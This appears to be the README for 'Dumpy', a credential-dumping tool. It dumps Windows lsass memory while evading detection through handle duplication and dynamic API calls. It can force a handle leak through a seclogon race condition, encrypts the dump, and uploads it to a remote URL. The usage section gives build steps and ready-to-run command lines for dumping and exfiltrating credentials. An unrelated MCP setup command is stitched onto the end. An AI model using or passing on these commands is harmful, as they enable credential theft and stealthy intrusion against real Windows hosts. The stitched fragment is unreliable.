This tool dynamically calls MiniDumpWriteDump to dump lsass memory content. This process is done without opening a new process handle to lsass and using DInvoke_rs to make it harder to detect its malicious behaviour. In order to obtain a valid process handle without calling OpenProcess over lsass, all process handles in the system are analyzed using NtQuerySystemInformation, NtDuplicateObject, NtQueryObject and QueryFullProcessImageNameW.
NTFS Transaction are used in order to xor the memory dump before storing it on disk or sending it throught HTTP.
Support added for both x86 and x64.
Just compile the code on release mode and execute it:
C:\Users\User\Desktop\Dumpy\dumpy> cargo build --release
C:\Users\User\Desktop\Dumpy\dumpy\target\x86_64-pc-windows-msvc\release> dumpy.exe -h
In case that you want to compile the tool for a x86 system, modify the value of the option "target" in the file .cargo\config (e.g: target = "i686-pc-windows-msvc").
Usage: dumpy.exe --dump|--decrypt [options]
Options:
-h, --help Print this help menu.
--dump Dump lsass.
--decrypt Decrypt a previously generated dump file.
-f, --force Force seclogon's service to leak a lsass handle
through a race condition.
-k, --key Encryption key [default: 1234abcd]
-i, --input Encrypted dump file [default: c:\temp\input.txt]
-o, --output Destination path [default: c:\temp\output.txt]
-u, --upload Upload URL
Dumpy has two main actions:
C:\Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload
If you want to force the leakage of a handle to the lsass through the race condition in seclogon's service described by Antonio Cocomazzi in this post, just use the option force:
C:\Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload --force
C:\Temp> dumpy.exe --decrypt -i xored.txt -o decrypted.txt -k secretKey
$ claude mcp add Dumpy \
-- python -m otcore.mcp_server <graph>